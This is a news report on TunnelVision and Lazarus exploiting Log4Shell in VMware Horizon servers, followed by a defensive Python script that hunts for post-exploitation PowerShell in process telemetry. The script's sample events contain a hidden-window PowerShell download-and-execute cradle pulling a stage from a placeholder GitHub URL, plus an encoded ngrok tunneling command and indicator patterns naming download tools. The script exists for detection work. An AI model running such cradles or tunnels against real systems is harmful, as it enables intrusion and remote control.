
Hackers aligned with the government of Iran are exploiting the critical Log4j vulnerability to infect unpatched VMware users with ransomware, researchers said on Thursday.

Security firm SentinelOne has dubbed the group TunnelVision. The name is meant to emphasize TunnelVision’s heavy reliance on tunneling tools and the unique way it deploys them. In the past, TunnelVision has exploited so-called 1-day vulnerabilities, meaning vulnerabilities that have been recently patched, to hack organizations that have yet to install the fix. Vulnerabilities in Fortinet FortiOS (CVE-2018-13379) and Microsoft Exchange (ProxyShell) are two of the group’s better-known targets.

Recently, SentinelOne reported, TunnelVision has started exploiting a critical vulnerability in Log4j, an open source logging utility that’s integrated into thousands of apps. CVE-2021-44228, tracked under that identifier and nicknamed Log4Shell, allows attackers to easily gain remote control over computers running apps written in the Java programming language. The bug bit the Internet’s biggest players and was widely targeted in the wild after it became known.

The cybersecurity company said it’s associating the attacks with a separate Iranian cluster not because they are unrelated, but owing to the fact that “there is at present insufficient data to treat them as identical to any of the aforementioned attributions.”

All through the activity, the threat actor is said to have utilized a GitHub repository known as “VmWareHorizon” under the username “protections20” to host the malicious payloads. PowerShell commands executed on the compromised server are used as a launchpad to download tools like Ngrok and run further commands by means of reverse shells, which in turn drop a PowerShell backdoor that’s capable of gathering credentials and executing reconnaissance commands. SentinelOne also said it identified similarities between the mechanism used to execute the reverse web shell and another PowerShell-based implant called PowerLess that was disclosed by Cybereason researchers earlier this month.

Additionally, Lazarus, a North Korean state-sponsored threat actor, is exploiting Log4Shell as an initial attack vector against VMware Horizon servers. All internal and external Horizon components, including Connection Server, Agent, Cloud Connector and UAG, must address the Log4j vulnerabilities urgently. VMware, an American cloud computing and virtualization technology company headquartered in Palo Alto, California, was the first commercially successful company to virtualize the x86 architecture; its desktop software runs on Microsoft Windows, Linux, and macOS.
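The post-exploitation chain described above (a shell launched under the exploited Java service, a download cradle pulling a stage from GitHub, Ngrok for tunneling) leaves a recognizable trail in endpoint process-creation telemetry. The Python below is an added example written for this page, not code from SentinelOne, Cybereason or VMware: it walks constructed Sysmon-style process events, flags shells whose parent is the Horizon Connection Server’s Tomcat wrapper (ws_TomcatService.exe and its default install path are assumptions; the article does not name the process), decodes any -EncodedCommand payload so hidden indicators are not missed, and labels each finding with the indicators the article mentions. The sample events, PIDs and GitHub URL are constructed placeholders.

```python
"""Hunt for post-Log4Shell PowerShell activity on a VMware Horizon server.

Added example, not SentinelOne or VMware code. Input is a list of
process-creation events (pid, ppid, image, command_line) such as Sysmon
Event ID 1 would provide; the events at the bottom are constructed.
"""
import base64
import re

# Parents from which a shell child is unexpected. ws_TomcatService.exe is the
# service wrapper around the Horizon Connection Server's Tomcat (ASSUMPTION:
# the article does not name the process); java.exe covers other Java services.
HORIZON_PARENTS = ("ws_tomcatservice.exe", "java.exe")
SHELLS = ("powershell.exe", "pwsh.exe", "cmd.exe")

# Indicators taken from the chain the article describes: a download cradle,
# a payload staged on GitHub, Ngrok for tunneling, plus a hidden window.
INDICATORS = {
    "download cradle": re.compile(
        r"(?i)invoke-webrequest|\biwr\b|downloadstring|downloadfile|"
        r"invoke-expression|\biex\b|\bcurl\b|\bwget\b|bitsadmin|certutil"),
    "payload hosted on GitHub": re.compile(r"(?i)raw\.githubusercontent\.com|github\.com"),
    "tunneling tool (Ngrok)": re.compile(r"(?i)\bngrok\b"),
    "hidden window": re.compile(r"(?i)-w(?:indowstyle)?\s+hidden"),
}

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec,
# -enc, ...) followed by base64 of a UTF-16LE string. Heuristic: require a
# base64-looking token of at least 16 characters so "-ExecutionPolicy Bypass"
# does not match.
ENCODED_RE = re.compile(r"(?i)(?:^|\s)-e[a-z]*\s+([A-Za-z0-9+/=]{16,})")


def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(command_line):
    """Return the decoded -EncodedCommand script, or None if there is none."""
    m = ENCODED_RE.search(command_line)
    if m is None:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(events):
    """Flag shells whose parent is the Horizon Tomcat service and label why."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        if basename(e["image"]) not in SHELLS:
            continue
        parent = by_pid.get(e["ppid"])
        if parent is None or basename(parent["image"]) not in HORIZON_PARENTS:
            continue
        reasons = [f"shell spawned by {basename(parent['image'])}"]
        decoded = decode_encoded_command(e["command_line"])
        text = e["command_line"]
        if decoded is not None:
            reasons.append("encoded command")
            # Scan the decoded script instead of the base64 blob so the
            # indicators below are neither hidden nor spuriously matched by it.
            text = ENCODED_RE.sub(" ", text) + " " + decoded
        for name, rx in INDICATORS.items():
            if rx.search(text):
                reasons.append(name)
        findings.append({"pid": e["pid"], "reasons": reasons, "decoded": decoded})
    return findings


# Constructed sample telemetry. Paths are the default Horizon install location
# (assumption); the GitHub URL is a placeholder, not the real repository.
_TOMCAT = r"C:\Program Files\VMware\VMware View\Server\bin\ws_TomcatService.exe"
_POWERSHELL = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Encoded payload built here so the sample stays self-contained: a constructed
# one-liner that launches ngrok, not a real TunnelVision command.
_ENCODED = base64.b64encode(
    "Start-Process ngrok.exe -ArgumentList 'tcp 3389'".encode("utf-16-le")).decode()

SAMPLE_EVENTS = [
    {"pid": 4120, "ppid": 800, "image": _TOMCAT, "command_line": f'"{_TOMCAT}"'},
    {"pid": 5532, "ppid": 4120, "image": _POWERSHELL, "command_line":
        "powershell.exe -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString("
        "'https://raw.githubusercontent.com/example-user/VmWareHorizon/main/stage1.ps1')\""},
    {"pid": 5600, "ppid": 4120, "image": _POWERSHELL,
     "command_line": f"powershell.exe -enc {_ENCODED}"},
    {"pid": 3000, "ppid": 1, "image": r"C:\Windows\explorer.exe", "command_line": "explorer.exe"},
    {"pid": 7000, "ppid": 3000, "image": _POWERSHELL, "command_line": "powershell.exe -c Get-Service"},
]

if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f["pid"], "; ".join(f["reasons"]))
        if f["decoded"]:
            print("   decoded:", f["decoded"])
```

Run as a script it prints the two flagged PowerShell processes and the decoded Ngrok command; the admin PowerShell launched from Explorer is left alone. In production the event source would be Sysmon Event ID 1 or EDR telemetry, and HORIZON_PARENTS should be extended to whatever Java service hosts Log4j in the environment. The decoding step is the part worth keeping: a plain command-line match sees only a base64 blob when the operator uses -enc, which hides every other indicator.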
